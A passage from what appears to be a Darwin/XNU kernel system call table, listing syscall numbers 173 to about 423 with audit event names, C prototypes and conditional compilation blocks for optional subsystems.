173 AUE_WAITID ALL { int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options); }
174 AUE_NULL ALL { int nosys(void); } { old getdents }
175 AUE_NULL ALL { int nosys(void); } { old gc_control }
176 AUE_ADDPROFILE ALL { int add_profil(short *bufbase, size_t bufsize, u_long pcoffset, u_int pcscale); }
177 AUE_NULL ALL { int nosys(void); }
178 AUE_NULL ALL { int nosys(void); }
179 AUE_NULL ALL { int nosys(void); }
180 AUE_KDEBUGTRACE ALL { int kdebug_trace(int code, int arg1, int arg2, int arg3, int arg4, int arg5) NO_SYSCALL_STUB; }
181 AUE_SETGID ALL { int setgid(gid_t gid); }
182 AUE_SETEGID ALL { int setegid(gid_t egid); }
183 AUE_SETEUID ALL { int seteuid(uid_t euid); }
184 AUE_SIGRETURN ALL { int sigreturn(struct ucontext *uctx, int infostyle) NO_SYSCALL_STUB; }
185 AUE_CHUD ALL { int chud(uint64_t code, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t arg4, uint64_t arg5) NO_SYSCALL_STUB; }
186 AUE_NULL ALL { int nosys(void); }
187 AUE_FDATASYNC ALL { int fdatasync(int fd); }
188 AUE_STAT ALL { int stat(user_addr_t path, user_addr_t ub); }
189 AUE_FSTAT ALL { int fstat(int fd, user_addr_t ub); }
190 AUE_LSTAT ALL { int lstat(user_addr_t path, user_addr_t ub); }
191 AUE_PATHCONF ALL { int pathconf(char *path, int name); }
192 AUE_FPATHCONF ALL { int fpathconf(int fd, int name); }
193 AUE_NULL ALL { int nosys(void); }
194 AUE_GETRLIMIT ALL { int getrlimit(u_int which, struct rlimit *rlp); }
195 AUE_SETRLIMIT ALL { int setrlimit(u_int which, struct rlimit *rlp); }
196 AUE_GETDIRENTRIES ALL { int getdirentries(int fd, char *buf, u_int count, long *basep); }
197 AUE_MMAP ALL { user_addr_t mmap(caddr_t addr, size_t len, int prot, int flags, int fd, off_t pos); }
198 AUE_NULL ALL { int nosys(void); } { __syscall }
199 AUE_LSEEK ALL { off_t lseek(int fd, off_t offset, int whence); }
200 AUE_TRUNCATE ALL { int truncate(char *path, off_t length); }
201 AUE_FTRUNCATE ALL { int ftruncate(int fd, off_t length); }
202 AUE_SYSCTL ALL { int __sysctl(int *name, u_int namelen, void *old, size_t *oldlenp, void *new, size_t newlen); }
203 AUE_MLOCK ALL { int mlock(caddr_t addr, size_t len); }
204 AUE_MUNLOCK ALL { int munlock(caddr_t addr, size_t len); }
205 AUE_UNDELETE ALL { int undelete(user_addr_t path); }

#if NETAT
206 AUE_ATSOCKET ALL { int ATsocket(int proto); }
207 AUE_ATGETMSG UALL { int ATgetmsg(int fd, void *ctlptr, void *datptr, int *flags); }
208 AUE_ATPUTMSG UALL { int ATputmsg(int fd, void *ctlptr, void *datptr, int flags); }
209 AUE_ATPSNDREQ UALL { int ATPsndreq(int fd, unsigned char *buf, int len, int nowait); }
210 AUE_ATPSNDRSP UALL { int ATPsndrsp(int fd, unsigned char *respbuff, int resplen, int datalen); }
211 AUE_ATPGETREQ UALL { int ATPgetreq(int fd, unsigned char *buf, int buflen); }
212 AUE_ATPGETRSP UALL { int ATPgetrsp(int fd, unsigned char *bdsp); }
213 AUE_NULL ALL { int nosys(void); } { Reserved for AppleTalk }
#else
206 AUE_NULL ALL { int nosys(void); }
207 AUE_NULL ALL { int nosys(void); }
208 AUE_NULL ALL { int nosys(void); }
209 AUE_NULL ALL { int nosys(void); }
210 AUE_NULL ALL { int nosys(void); }
211 AUE_NULL ALL { int nosys(void); }
212 AUE_NULL ALL { int nosys(void); }
213 AUE_NULL ALL { int nosys(void); } { Reserved for AppleTalk }
#endif /* NETAT */

214 AUE_NULL ALL { int nosys(void); }
215 AUE_NULL ALL { int nosys(void); }

; System Calls 216 - 230 are reserved for calls to support HFS/HFS Plus
; file system semantics. Currently, we only use 215-227. The rest is
; for future expansion in anticipation of new MacOS APIs for HFS Plus.
; These calls are not conditionalized because while they are specific
; to HFS semantics, they are not specific to the HFS filesystem.
; We expect all filesystems to recognize the call and report that it is
; not supported or to actually implement it.
216 AUE_MKCOMPLEX UHN { int mkcomplex(const char *path, mode_t mode, u_long type); } { soon to be obsolete }
217 AUE_STATV UHN { int statv(const char *path, struct vstat *vsb); } { soon to be obsolete }
218 AUE_LSTATV UHN { int lstatv(const char *path, struct vstat *vsb); } { soon to be obsolete }
219 AUE_FSTATV UHN { int fstatv(int fd, struct vstat *vsb); } { soon to be obsolete }
220 AUE_GETATTRLIST ALL { int getattrlist(const char *path, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); }
221 AUE_SETATTRLIST ALL { int setattrlist(const char *path, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); }
222 AUE_GETDIRENTRIESATTR ALL { int getdirentriesattr(int fd, struct attrlist *alist, void *buffer, size_t buffersize, u_long *count, u_long *basep, u_long *newstate, u_long options); }
223 AUE_EXCHANGEDATA ALL { int exchangedata(const char *path1, const char *path2, u_long options); }
224 AUE_NULL ALL { int nosys(void); } { old checkuseraccess / fsgetpath (which moved to 427) }
225 AUE_SEARCHFS ALL { int searchfs(const char *path, struct fssearchblock *searchblock, uint32_t *nummatches, uint32_t scriptcode, uint32_t options, struct searchstate *state); }
226 AUE_DELETE ALL { int delete(user_addr_t path) NO_SYSCALL_STUB; } { private delete (Carbon semantics) }
227 AUE_COPYFILE ALL { int copyfile(char *from, char *to, int mode, int flags) NO_SYSCALL_STUB; }
228 AUE_FGETATTRLIST ALL { int fgetattrlist(int fd, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); }
229 AUE_FSETATTRLIST ALL { int fsetattrlist(int fd, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); }
230 AUE_POLL ALL { int poll(struct pollfd *fds, u_int nfds, int timeout); }
231 AUE_WATCHEVENT ALL { int watchevent(struct eventreq *u_req, int u_eventmask); }
232 AUE_WAITEVENT ALL { int waitevent(struct eventreq *u_req, struct timeval *tv); }
233 AUE_MODWATCH ALL { int modwatch(struct eventreq *u_req, int u_eventmask); }
234 AUE_GETXATTR ALL { user_ssize_t getxattr(user_addr_t path, user_addr_t attrname, user_addr_t value, size_t size, uint32_t position, int options); }
235 AUE_FGETXATTR ALL { user_ssize_t fgetxattr(int fd, user_addr_t attrname, user_addr_t value, size_t size, uint32_t position, int options); }
236 AUE_SETXATTR ALL { int setxattr(user_addr_t path, user_addr_t attrname, user_addr_t value, size_t size, uint32_t position, int options); }
237 AUE_FSETXATTR ALL { int fsetxattr(int fd, user_addr_t attrname, user_addr_t value, size_t size, uint32_t position, int options); }
238 AUE_REMOVEXATTR ALL { int removexattr(user_addr_t path, user_addr_t attrname, int options); }
239 AUE_FREMOVEXATTR ALL { int fremovexattr(int fd, user_addr_t attrname, int options); }
240 AUE_LISTXATTR ALL { user_ssize_t listxattr(user_addr_t path, user_addr_t namebuf, size_t bufsize, int options); }
241 AUE_FLISTXATTR ALL { user_ssize_t flistxattr(int fd, user_addr_t namebuf, size_t bufsize, int options); }
242 AUE_FSCTL ALL { int fsctl(const char *path, u_long cmd, caddr_t data, u_int options); }
243 AUE_INITGROUPS ALL { int initgroups(u_int gidsetsize, gid_t *gidset, int gmuid); }
244 AUE_POSIX_SPAWN ALL { int posix_spawn(pid_t *pid, const char *path, const struct _posix_spawn_args_desc *adesc, char **argv, char **envp); }
245 AUE_FFSCTL ALL { int ffsctl(int fd, u_long cmd, caddr_t data, u_int options); }
246 AUE_NULL ALL { int nosys(void); }

#if NFSCLIENT
247 AUE_NULL ALL { int nfsclnt(int flag, caddr_t argp); }
#else
247 AUE_NULL ALL { int nosys(void); }
#endif
#if NFSSERVER
248 AUE_FHOPEN ALL { int fhopen(const struct fhandle *u_fhp, int flags); }
#else
248 AUE_NULL ALL { int nosys(void); }
#endif
249 AUE_NULL ALL { int nosys(void); }
250 AUE_MINHERIT ALL { int minherit(void *addr, size_t len, int inherit); }
#if SYSV_SEM
251 AUE_SEMSYS ALL { int semsys(u_int which, int a2, int a3, int a4, int a5); }
#else
251 AUE_NULL ALL { int nosys(void); }
#endif
#if SYSV_MSG
252 AUE_MSGSYS ALL { int msgsys(u_int which, int a2, int a3, int a4, int a5); }
#else
252 AUE_NULL ALL { int nosys(void); }
#endif
#if SYSV_SHM
253 AUE_SHMSYS ALL { int shmsys(u_int which, int a2, int a3, int a4); }
#else
253 AUE_NULL ALL { int nosys(void); }
#endif
#if SYSV_SEM
254 AUE_SEMCTL ALL { int semctl(int semid, int semnum, int cmd, semun_t arg); }
255 AUE_SEMGET ALL { int semget(key_t key, int nsems, int semflg); }
256 AUE_SEMOP ALL { int semop(int semid, struct sembuf *sops, int nsops); }
257 AUE_NULL ALL { int nosys(void); }
#else
254 AUE_NULL ALL { int nosys(void); }
255 AUE_NULL ALL { int nosys(void); }
256 AUE_NULL ALL { int nosys(void); }
257 AUE_NULL ALL { int nosys(void); }
#endif
#if SYSV_MSG
258 AUE_MSGCTL ALL { int msgctl(int msqid, int cmd, struct msqid_ds *buf); }
259 AUE_MSGGET ALL { int msgget(key_t key, int msgflg); }
260 AUE_MSGSND ALL { int msgsnd(int msqid, void *msgp, size_t msgsz, int msgflg); }
261 AUE_MSGRCV ALL { user_ssize_t msgrcv(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg); }
#else
258 AUE_NULL ALL { int nosys(void); }
259 AUE_NULL ALL { int nosys(void); }
260 AUE_NULL ALL { int nosys(void); }
261 AUE_NULL ALL { int nosys(void); }
#endif
#if SYSV_SHM
262 AUE_SHMAT ALL { user_addr_t shmat(int shmid, void *shmaddr, int shmflg); }
263 AUE_SHMCTL ALL { int shmctl(int shmid, int cmd, struct shmid_ds *buf); }
264 AUE_SHMDT ALL { int shmdt(void *shmaddr); }
265 AUE_SHMGET ALL { int shmget(key_t key, size_t size, int shmflg); }
#else
262 AUE_NULL ALL { int nosys(void); }
263 AUE_NULL ALL { int nosys(void); }
264 AUE_NULL ALL { int nosys(void); }
265 AUE_NULL ALL { int nosys(void); }
#endif
266 AUE_SHMOPEN ALL { int shm_open(const char *name, int oflag, int mode); }
267 AUE_SHMUNLINK ALL { int shm_unlink(const char *name); }
268 AUE_SEMOPEN ALL { user_addr_t sem_open(const char *name, int oflag, int mode, int value); }
269 AUE_SEMCLOSE ALL { int sem_close(sem_t *sem); }
270 AUE_SEMUNLINK ALL { int sem_unlink(const char *name); }
271 AUE_SEMWAIT ALL { int sem_wait(sem_t *sem); }
272 AUE_SEMTRYWAIT ALL { int sem_trywait(sem_t *sem); }
273 AUE_SEMPOST ALL { int sem_post(sem_t *sem); }
274 AUE_SEMGETVALUE ALL { int sem_getvalue(sem_t *sem, int *sval); }
275 AUE_SEMINIT ALL { int sem_init(sem_t *sem, int phsared, u_int value); }
276 AUE_SEMDESTROY ALL { int sem_destroy(sem_t *sem); }
277 AUE_OPEN_EXTENDED_RWTC ALL { int open_extended(user_addr_t path, int flags, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; }
278 AUE_UMASK_EXTENDED ALL { int umask_extended(int newmask, user_addr_t xsecurity) NO_SYSCALL_STUB; }
279 AUE_STAT_EXTENDED ALL { int stat_extended(user_addr_t path, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; }
280 AUE_LSTAT_EXTENDED ALL { int lstat_extended(user_addr_t path, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; }
281 AUE_FSTAT_EXTENDED ALL { int fstat_extended(int fd, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; }
282 AUE_CHMOD_EXTENDED ALL { int chmod_extended(user_addr_t path, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; }
283 AUE_FCHMOD_EXTENDED ALL { int fchmod_extended(int fd, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; }
284 AUE_ACCESS_EXTENDED ALL { int access_extended(user_addr_t entries, size_t size, user_addr_t results, uid_t uid) NO_SYSCALL_STUB; }
285 AUE_SETTID ALL { int settid(uid_t uid, gid_t gid) NO_SYSCALL_STUB; }
286 AUE_GETTID ALL { int gettid(uid_t *uidp, gid_t *gidp) NO_SYSCALL_STUB; }
287 AUE_SETSGROUPS ALL { int setsgroups(int setlen, user_addr_t guidset) NO_SYSCALL_STUB; }
288 AUE_GETSGROUPS ALL { int getsgroups(user_addr_t setlen, user_addr_t guidset) NO_SYSCALL_STUB; }
289 AUE_SETWGROUPS ALL { int setwgroups(int setlen, user_addr_t guidset) NO_SYSCALL_STUB; }
290 AUE_GETWGROUPS ALL { int getwgroups(user_addr_t setlen, user_addr_t guidset) NO_SYSCALL_STUB; }
291 AUE_MKFIFO_EXTENDED ALL { int mkfifo_extended(user_addr_t path, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; }
292 AUE_MKDIR_EXTENDED ALL { int mkdir_extended(user_addr_t path, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; }
293 AUE_IDENTITYSVC ALL { int identitysvc(int opcode, user_addr_t message) NO_SYSCALL_STUB; }
294 AUE_NULL ALL { int shared_region_check_np(uint64_t *start_address) NO_SYSCALL_STUB; }
295 AUE_NULL ALL { int shared_region_map_np(int fd, uint32_t count, const struct shared_file_mapping_np *mappings) NO_SYSCALL_STUB; }
296 AUE_NULL ALL { int vm_pressure_monitor(int wait_for_pressure, int nsecs_monitored, uint32_t *pages_reclaimed); }
#if PSYNCH
297 AUE_NULL ALL { uint32_t psynch_rw_longrdlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; }
298 AUE_NULL ALL { uint32_t psynch_rw_yieldwrlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; }
299 AUE_NULL ALL { int psynch_rw_downgrade(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; }
300 AUE_NULL ALL { uint32_t psynch_rw_upgrade(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; }
301 AUE_NULL ALL { uint32_t psynch_mutexwait(user_addr_t mutex, uint32_t mgen, uint32_t ugen, uint64_t tid, uint32_t flags) NO_SYSCALL_STUB; }
302 AUE_NULL ALL { uint32_t psynch_mutexdrop(user_addr_t mutex, uint32_t mgen, uint32_t ugen, uint64_t tid, uint32_t flags) NO_SYSCALL_STUB; }
303 AUE_NULL ALL { int psynch_cvbroad(user_addr_t cv, uint32_t cvgen, uint32_t diffgen, user_addr_t mutex, uint32_t mgen, uint32_t ugen, uint64_t tid, uint32_t flags) NO_SYSCALL_STUB; }
304 AUE_NULL ALL { int psynch_cvsignal(user_addr_t cv, uint32_t cvgen, uint32_t cvugen, user_addr_t mutex, uint32_t mgen, uint32_t ugen, int thread_port, uint32_t flags) NO_SYSCALL_STUB; }
305 AUE_NULL ALL { uint32_t psynch_cvwait(user_addr_t cv, uint32_t cvgen, uint32_t cvugen, user_addr_t mutex, uint32_t mgen, uint32_t ugen, uint64_t sec, uint64_t usec) NO_SYSCALL_STUB; }
306 AUE_NULL ALL { uint32_t psynch_rw_rdlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; }
307 AUE_NULL ALL { uint32_t psynch_rw_wrlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; }
308 AUE_NULL ALL { uint32_t psynch_rw_unlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; }
309 AUE_NULL ALL { uint32_t psynch_rw_unlock2(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; }
#else
297 AUE_NULL ALL { int nosys(void); } { old reset_shared_file }
298 AUE_NULL ALL { int nosys(void); } { old new_system_shared_regions }
299 AUE_NULL ALL { int enosys(void); } { old shared_region_map_file_np }
300 AUE_NULL ALL { int enosys(void); } { old shared_region_make_private_np }
301 AUE_NULL ALL { int nosys(void); }
302 AUE_NULL ALL { int nosys(void); }
303 AUE_NULL ALL { int nosys(void); }
304 AUE_NULL ALL { int nosys(void); }
305 AUE_NULL ALL { int nosys(void); }
306 AUE_NULL ALL { int nosys(void); }
307 AUE_NULL ALL { int nosys(void); }
308 AUE_NULL ALL { int nosys(void); }
309 AUE_NULL ALL { int nosys(void); }
#endif
310 AUE_GETSID ALL { int getsid(pid_t pid); }
311 AUE_SETTIDWITHPID ALL { int settid_with_pid(pid_t pid, int assume) NO_SYSCALL_STUB; }
312 AUE_NULL ALL { int nosys(void); } { old __pthread_cond_timedwait }
313 AUE_NULL ALL { int aio_fsync(int op, user_addr_t aiocbp); }
314 AUE_NULL ALL { user_ssize_t aio_return(user_addr_t aiocbp); }
315 AUE_NULL ALL { int aio_suspend(user_addr_t aiocblist, int nent, user_addr_t timeoutp); }
316 AUE_NULL ALL { int aio_cancel(int fd, user_addr_t aiocbp); }
317 AUE_NULL ALL { int aio_error(user_addr_t aiocbp); }
318 AUE_NULL ALL { int aio_read(user_addr_t aiocbp); }
319 AUE_NULL ALL { int aio_write(user_addr_t aiocbp); }
320 AUE_LIOLISTIO ALL { int lio_listio(int mode, user_addr_t aiocblist, int nent, user_addr_t sigp); }
321 AUE_NULL ALL { int nosys(void); } { old __pthread_cond_wait }
322 AUE_IOPOLICYSYS ALL { int iopolicysys(int cmd, void *arg) NO_SYSCALL_STUB; }
323 AUE_NULL ALL { int nosys(void); }
324 AUE_MLOCKALL ALL { int mlockall(int how); }
325 AUE_MUNLOCKALL ALL { int munlockall(int how); }
326 AUE_NULL ALL { int nosys(void); }
327 AUE_ISSETUGID ALL { int issetugid(void); }
328 AUE_PTHREADKILL ALL { int __pthread_kill(int thread_port, int sig); }
329 AUE_PTHREADSIGMASK ALL { int __pthread_sigmask(int how, user_addr_t set, user_addr_t oset); }
330 AUE_SIGWAIT ALL { int __sigwait(user_addr_t set, user_addr_t sig); }
331 AUE_NULL ALL { int __disable_threadsignal(int value); }
332 AUE_NULL ALL { int __pthread_markcancel(int thread_port); }
333 AUE_NULL ALL { int __pthread_canceled(int action); }

;#if OLD_SEMWAIT_SIGNAL
;334 AUE_NULL ALL { int nosys(void); } { old __semwait_signal }
;#else
334 AUE_SEMWAITSIGNAL ALL { int __semwait_signal(int cond_sem, int mutex_sem, int timeout, int relative, int64_t tv_sec, int32_t tv_nsec); }
;#endif

335 AUE_NULL ALL { int nosys(void); } { old utrace }
336 AUE_PROCINFO ALL { int proc_info(int32_t callnum,int32_t pid,uint32_t flavor, uint64_t arg,user_addr_t buffer,int32_t buffersize) NO_SYSCALL_STUB; }
#if SENDFILE
337 AUE_SENDFILE ALL { int sendfile(int fd, int s, off_t offset, off_t *nbytes, struct sf_hdtr *hdtr, int flags); }
#else /* !SENDFILE */
337 AUE_NULL ALL { int nosys(void); }
#endif /* SENDFILE */
338 AUE_STAT64 ALL { int stat64(user_addr_t path, user_addr_t ub); }
339 AUE_FSTAT64 ALL { int fstat64(int fd, user_addr_t ub); }
340 AUE_LSTAT64 ALL { int lstat64(user_addr_t path, user_addr_t ub); }
341 AUE_STAT64_EXTENDED ALL { int stat64_extended(user_addr_t path, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; }
342 AUE_LSTAT64_EXTENDED ALL { int lstat64_extended(user_addr_t path, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; }
343 AUE_FSTAT64_EXTENDED ALL { int fstat64_extended(int fd, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; }
344 AUE_GETDIRENTRIES64 ALL { user_ssize_t getdirentries64(int fd, void *buf, user_size_t bufsize, off_t *position) NO_SYSCALL_STUB; }
345 AUE_STATFS64 ALL { int statfs64(char *path, struct statfs64 *buf); }
346 AUE_FSTATFS64 ALL { int fstatfs64(int fd, struct statfs64 *buf); }
347 AUE_GETFSSTAT64 ALL { int getfsstat64(user_addr_t buf, int bufsize, int flags); }
348 AUE_NULL ALL { int __pthread_chdir(user_addr_t path); }
349 AUE_NULL ALL { int __pthread_fchdir(int fd); }
350 AUE_AUDIT ALL { int audit(void *record, int length); }
351 AUE_AUDITON ALL { int auditon(int cmd, void *data, int length); }
352 AUE_NULL ALL { int nosys(void); }
353 AUE_GETAUID ALL { int getauid(au_id_t *auid); }
354 AUE_SETAUID ALL { int setauid(au_id_t *auid); }
355 AUE_GETAUDIT ALL { int getaudit(struct auditinfo *auditinfo); }
356 AUE_SETAUDIT ALL { int setaudit(struct auditinfo *auditinfo); }
357 AUE_GETAUDIT_ADDR ALL { int getaudit_addr(struct auditinfo_addr *auditinfo_addr, int length); }
358 AUE_SETAUDIT_ADDR ALL { int setaudit_addr(struct auditinfo_addr *auditinfo_addr, int length); }
359 AUE_AUDITCTL ALL { int auditctl(char *path); }
#if CONFIG_WORKQUEUE
360 AUE_NULL ALL { user_addr_t bsdthread_create(user_addr_t func, user_addr_t func_arg, user_addr_t stack, user_addr_t pthread, uint32_t flags) NO_SYSCALL_STUB; }
361 AUE_NULL ALL { int bsdthread_terminate(user_addr_t stackaddr, size_t freesize, uint32_t port, uint32_t sem) NO_SYSCALL_STUB; }
#else
360 AUE_NULL ALL { int nosys(void); }
361 AUE_NULL ALL { int nosys(void); }
#endif /* CONFIG_WORKQUEUE */
362 AUE_KQUEUE ALL { int kqueue(void); }
363 AUE_NULL ALL { int kevent(int fd, const struct kevent *changelist, int nchanges, struct kevent *eventlist, int nevents, const struct timespec *timeout); }
364 AUE_LCHOWN ALL { int lchown(user_addr_t path, uid_t owner, gid_t group); }
365 AUE_STACKSNAPSHOT ALL { int stack_snapshot(pid_t pid, user_addr_t tracebuf, uint32_t tracebuf_size, uint32_t flags, uint32_t dispatch_offset) NO_SYSCALL_STUB; }
#if CONFIG_WORKQUEUE
366 AUE_NULL ALL { int bsdthread_register(user_addr_t threadstart, user_addr_t wqthread, int pthsize,user_addr_t dummy_value, user_addr_t targetconc_ptr, uint64_t dispatchqueue_offset) NO_SYSCALL_STUB; }
367 AUE_WORKQOPEN ALL { int workq_open(void) NO_SYSCALL_STUB; }
368 AUE_WORKQOPS ALL { int workq_kernreturn(int options, user_addr_t item, int affinity, int prio) NO_SYSCALL_STUB; }
#else
366 AUE_NULL ALL { int nosys(void); }
367 AUE_NULL ALL { int nosys(void); }
368 AUE_NULL ALL { int nosys(void); }
#endif /* CONFIG_WORKQUEUE */
369 AUE_NULL ALL { int kevent64(int fd, const struct kevent64_s *changelist, int nchanges, struct kevent64_s *eventlist, int nevents, unsigned int flags, const struct timespec *timeout); }
#if OLD_SEMWAIT_SIGNAL
370 AUE_SEMWAITSIGNAL ALL { int __old_semwait_signal(int cond_sem, int mutex_sem, int timeout, int relative, const struct timespec *ts); }
371 AUE_SEMWAITSIGNAL ALL { int __old_semwait_signal_nocancel(int cond_sem, int mutex_sem, int timeout, int relative, const struct timespec *ts) NO_SYSCALL_STUB; }
#else
370 AUE_NULL ALL { int nosys(void); } { old __semwait_signal }
371 AUE_NULL ALL { int nosys(void); } { old __semwait_signal }
#endif
372 AUE_NULL ALL { user_addr_t thread_selfid (void) NO_SYSCALL_STUB; }
373 AUE_NULL ALL { int nosys(void); }
374 AUE_NULL ALL { int nosys(void); }
375 AUE_NULL ALL { int nosys(void); }
376 AUE_NULL ALL { int nosys(void); }
377 AUE_NULL ALL { int nosys(void); }
378 AUE_NULL ALL { int nosys(void); }
379 AUE_NULL ALL { int nosys(void); }
380 AUE_MAC_EXECVE ALL { int __mac_execve(char *fname, char **argp, char **envp, struct mac *mac_p); }
381 AUE_MAC_SYSCALL ALL { int __mac_syscall(char *policy, int call, user_addr_t arg); }
382 AUE_MAC_GET_FILE ALL { int __mac_get_file(char *path_p, struct mac *mac_p); }
383 AUE_MAC_SET_FILE ALL { int __mac_set_file(char *path_p, struct mac *mac_p); }
384 AUE_MAC_GET_LINK ALL { int __mac_get_link(char *path_p, struct mac *mac_p); }
385 AUE_MAC_SET_LINK ALL { int __mac_set_link(char *path_p, struct mac *mac_p); }
386 AUE_MAC_GET_PROC ALL { int __mac_get_proc(struct mac *mac_p); }
387 AUE_MAC_SET_PROC ALL { int __mac_set_proc(struct mac *mac_p); }
388 AUE_MAC_GET_FD ALL { int __mac_get_fd(int fd, struct mac *mac_p); }
389 AUE_MAC_SET_FD ALL { int __mac_set_fd(int fd, struct mac *mac_p); }
390 AUE_MAC_GET_PID ALL { int __mac_get_pid(pid_t pid, struct mac *mac_p); }
391 AUE_MAC_GET_LCID ALL { int __mac_get_lcid(pid_t lcid, struct mac *mac_p); }
392 AUE_MAC_GET_LCTX ALL { int __mac_get_lctx(struct mac *mac_p); }
393 AUE_MAC_SET_LCTX ALL { int __mac_set_lctx(struct mac *mac_p); }
394 AUE_SETLCID ALL { int setlcid(pid_t pid, pid_t lcid) NO_SYSCALL_STUB; }
395 AUE_GETLCID ALL { int getlcid(pid_t pid) NO_SYSCALL_STUB; }
396 AUE_NULL ALL { user_ssize_t read_nocancel(int fd, user_addr_t cbuf, user_size_t nbyte) NO_SYSCALL_STUB; }
397 AUE_NULL ALL { user_ssize_t write_nocancel(int fd, user_addr_t cbuf, user_size_t nbyte) NO_SYSCALL_STUB; }
398 AUE_OPEN_RWTC ALL { int open_nocancel(user_addr_t path, int flags, int mode) NO_SYSCALL_STUB; }
399 AUE_CLOSE ALL { int close_nocancel(int fd) NO_SYSCALL_STUB; }
400 AUE_WAIT4 ALL { int wait4_nocancel(int pid, user_addr_t status, int options, user_addr_t rusage) NO_SYSCALL_STUB; }
#if SOCKETS
401 AUE_RECVMSG ALL { int recvmsg_nocancel(int s, struct msghdr *msg, int flags) NO_SYSCALL_STUB; }
402 AUE_SENDMSG ALL { int sendmsg_nocancel(int s, caddr_t msg, int flags) NO_SYSCALL_STUB; }
403 AUE_RECVFROM ALL { int recvfrom_nocancel(int s, void *buf, size_t len, int flags, struct sockaddr *from, int *fromlenaddr) NO_SYSCALL_STUB; }
404 AUE_ACCEPT ALL { int accept_nocancel(int s, caddr_t name, socklen_t *anamelen) NO_SYSCALL_STUB; }
#else
401 AUE_NULL ALL { int nosys(void); }
402 AUE_NULL ALL { int nosys(void); }
403 AUE_NULL ALL { int nosys(void); }
404 AUE_NULL ALL { int nosys(void); }
#endif /* SOCKETS */
405 AUE_MSYNC ALL { int msync_nocancel(caddr_t addr, size_t len, int flags) NO_SYSCALL_STUB; }
406 AUE_FCNTL ALL { int fcntl_nocancel(int fd, int cmd, long arg) NO_SYSCALL_STUB; }
407 AUE_SELECT ALL { int select_nocancel(int nd, u_int32_t *in, u_int32_t *ou, u_int32_t *ex, struct timeval *tv) NO_SYSCALL_STUB; }
408 AUE_FSYNC ALL { int fsync_nocancel(int fd) NO_SYSCALL_STUB; }
#if SOCKETS
409 AUE_CONNECT ALL { int connect_nocancel(int s, caddr_t name, socklen_t namelen) NO_SYSCALL_STUB; }
#else
409 AUE_NULL ALL { int nosys(void); }
#endif /* SOCKETS */
410 AUE_NULL ALL { int sigsuspend_nocancel(sigset_t mask) NO_SYSCALL_STUB; }
411 AUE_READV ALL { user_ssize_t readv_nocancel(int fd, struct iovec *iovp, u_int iovcnt) NO_SYSCALL_STUB; }
412 AUE_WRITEV ALL { user_ssize_t writev_nocancel(int fd, struct iovec *iovp, u_int iovcnt) NO_SYSCALL_STUB; }
#if SOCKETS
413 AUE_SENDTO ALL { int sendto_nocancel(int s, caddr_t buf, size_t len, int flags, caddr_t to, socklen_t tolen) NO_SYSCALL_STUB; }
#else
413 AUE_NULL ALL { int nosys(void); }
#endif /* SOCKETS */
414 AUE_PREAD ALL { user_ssize_t pread_nocancel(int fd, user_addr_t buf, user_size_t nbyte, off_t offset) NO_SYSCALL_STUB; }
415 AUE_PWRITE ALL { user_ssize_t pwrite_nocancel(int fd, user_addr_t buf, user_size_t nbyte, off_t offset) NO_SYSCALL_STUB; }
416 AUE_WAITID ALL { int waitid_nocancel(idtype_t idtype, id_t id, siginfo_t *infop, int options) NO_SYSCALL_STUB; }
417 AUE_POLL ALL { int poll_nocancel(struct pollfd *fds, u_int nfds, int timeout) NO_SYSCALL_STUB; }
#if SYSV_MSG
418 AUE_MSGSND ALL { int msgsnd_nocancel(int msqid, void *msgp, size_t msgsz, int msgflg) NO_SYSCALL_STUB; }
419 AUE_MSGRCV ALL { user_ssize_t msgrcv_nocancel(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg) NO_SYSCALL_STUB; }
#else
418 AUE_NULL ALL { int nosys(void); }
419 AUE_NULL ALL { int nosys(void); }
#endif
420 AUE_SEMWAIT ALL { int sem_wait_nocancel(sem_t *sem) NO_SYSCALL_STUB; }
421 AUE_NULL ALL { int aio_suspend_nocancel(user_addr_t aiocblist, int nent, user_addr_t timeoutp) NO_SYSCALL_STUB; }
422 AUE_SIGWAIT ALL { int __sigwait_nocancel(user_addr_t set, user_addr_t sig) NO_SYSCALL_STUB; }
;#if OLD_SEMWAIT_SIGNAL
;423 AUE_NULL ALL { int nosys(void); } { old __semwait_signal_nocancel }
;#else
